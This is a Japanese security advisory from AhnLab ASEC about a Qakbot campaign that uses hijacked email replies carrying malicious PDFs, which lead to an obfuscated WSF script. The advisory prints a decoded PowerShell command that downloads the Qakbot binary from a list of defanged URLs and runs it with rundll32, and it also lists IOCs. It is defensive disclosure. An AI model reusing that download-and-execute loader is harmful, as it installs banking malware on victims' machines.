AhnLab Security Emergency response Center(ASEC)では従来の電子メールを利用(返信/転送)する形で不正な PDF ファイルを添付し、Qakbot マルウェアが配布されている状況を確認した。
バンキング型マルウェアとして知られている Qakbot は様々な媒体を通して拡散し続けているマルウェアの一つであり、ASEC では過去にもこのマルウェアの拡散動向を紹介したことがある。
拡散している電子メールは、以下のように正常なメールをハイジャックして不正なファイルを添付し、ユーザーに返信している形をとっているが、受信対象には従来の電子メールの受信/ CC のメールアドレスを利用していた。
原本の電子メールが送・受信された時期は2018~2022年と非常に多様であり、最近の電子メールではないことが確認された。
関連のない原文に対して添付ファイルとともに送信される本文の内容は、不自然な形をとっているが、添付ファイルの閲覧を誘導する内容が記載されている。
このメールを受信したユーザーは、正常な返信メールだと判断し、特に疑うことなく添付ファイルを実行してしまう可能性があるため、注意しなければならない。
図1) 不正な PDF を添付した電子メール (1)
図2) 不正な PDF を添付した電子メール (2)
図3) 不正な PDF を添付した電子メール (3)
電子メールに添付された PDF のファイル名は「UT.PDF」、「RA.PDF」、「NM.PDF」のように自動化によって生成したものと推定されるランダムな文字列であり、PDF ファイルを実行すると、以下のように Microsoft Azure のロゴとともに Open ボタンのクリックを誘導するメッセージが存在していることが分かる。
Open ボタンをクリックすると、不正な URL に接続され、この URL に接続が可能な場合、暗号化して圧縮された ZIP ファイルをダウンロードする。
パスワードがかけられた ZIP ファイルは PDF 本文に記載された「Password:755」を利用して解凍することができる。
図4) 電子メールに添付された PDF ファイルの実行画面
図5) PDF 内部の URL からダウンロードされる圧縮ファイル
圧縮を解凍して WSF ファイルを確認すると、以下のように AntiVirus 製品の検知を回避するためにダミーテキストとともに難読化されているスクリプトコードが確認できる。
意味のあるスクリプトコードは<job>タグの後に存在する。
図6) ダミーデータとともに難読化された WSF スクリプト
WSF ファイルを実行すると PowerShell プロセスを通して暗号化されたデータコマンドが実行されるが、このデータを復号化すると以下のようになる。
接続が有効な URL から Qakbot バイナリを TMP パスに undersluice.Calctuffs のファイル名でダウンロードした後、rundll32.exe プロセスを通して実行していることが分かる。
powershell.exe” -ENC “Start-Sleep -Seconds 2; $Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); foreach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}} catch {Start-Sleep -Seconds 2;}}
現在は接続できない URL だが、内部/外部インフラを通して接続が有効な当時にこの URL から Qakbot バイナリを配布した状況を確認することができた。
関連して類似したフォーマットで多数の不正な電子メールが継続的に拡散しているため、出どころの不明なメールの閲覧については注意しなければならない。また、使用している AntiVirus 製品を最新バージョンにアップデートして使用することを推奨する。
[ファイル検知]
Phishing/PDF.Agent (2023.04.07.02)
Phishing/PDF.Generic (2023.04.07.03)
Phishing/PDF.Malurl (2023.04.08.00)
Trojan/WSF.PSRunner (2023.04.08.00)
Trojan/Win.Evo-gen.C5403438 (2023.03.31.02)
Trojan/Win.Qakbot.C5406010 (2023.04.06.02)
Trojan/Win.Evo-gen.C5406771 (2023.04.07.02)
[IOC]
hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp
hxxps://qassimnews[.]com/yweNej/kQBDu
hxxps://stealingexcellence[.]com/rVR9r/yahxNk
hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil
hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J
hxxps://t-lows[.]com/ggAJ2m/kXpW59tm
hxxps://seicas[.]com/KvtM0/Uj3atvfT4E
hxxps://farmfutures[.]in/tlUtBc/IYj0K1
hxxps://alzheimersdigest[.]net/ZKpva/55C63K
hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc
19c1526182fe5ed0f1abfafc98d84df9
c9ab1cd04e796fd7f084a1dd2d40cc2d
b57532c33d7fead3105e9312cb544e11
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報